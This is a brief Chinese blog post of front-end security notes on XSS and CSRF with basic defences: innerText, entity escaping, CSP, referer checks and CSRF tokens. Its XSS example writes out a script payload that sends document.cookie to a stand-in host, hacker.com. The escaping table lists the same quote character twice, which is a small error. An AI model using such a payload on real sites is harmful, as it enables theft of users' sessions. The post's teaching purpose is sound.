安全相关

安全
其他
发布日期:   2018-06-10
更新日期:   2021-05-30
文章字数:   289
阅读时长:   1 分
阅读次数:  

安全

XSS 攻击

举例

div.innerHTML = (
  <script>$.get('http://hacker.com?cookie='+document.cookie)</script>
);
// 恶意代码就被执行了,这就是 XSS

预防
不要使用 innerHTML,改成 innerText,script 就会被当成文本,不执行
如果你一样要用 innerHTML,字符过滤
把 < 替换成 &lt;
把 > 替换成 &gt;
把 & 替换成 &amp;
把 ‘ 替换成 &#39;
把 ‘ 替换成 &quot;
代码 div.innerHTML = userComment.replace(/>/g, ‘&lt;‘).replace…
使用 CSP Content Security Policy

CSRF 攻击

利用用户的登录态发起恶意请求
过程
用户在 qq.com 登录
用户切换到 hacker.com(恶意网站)
hacker.com 发送一个 qq.com/add_friend 请求,让当前用户添加 hacker 为好友。
用户在不知不觉中添加 hacker 为好友。
用户没有想发这个请求,但是 hacker 伪造了用户发请求的假象。
避免
检查 referer,qq.com 可以拒绝来自 hacker.com 的请求
使用 csrf_token 来解决

文章作者: 沐雪
文章链接: http://whhjdi.github.io/2018/06/10/an-quan-xiang-guan/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 沐雪 !
安全
评论
 上一篇
jQuery jQuery
实现一个 jQuery 的 API实现一个函数,并判断参数是节点还是选择器,返回一个 nodes(数组形式的对象)让 addClass()可以同时增加几个 className,把 setText 变成 text(既能 getText,又能
2018-07-16 其他
jQuery
下一篇 
Web性能优化 Web性能优化
Web 性能优化想要进行优化必须先要了解一个页面从加载到展现的过程中经历了那些过程找到一篇好文章 从输入 URL 到页面展现中间发生了什么? 浏览器的地址栏输入 URL 并按下回车。我们常见的 URL 是这样的:http://www.bai
2018-06-01 其他
性能
  目录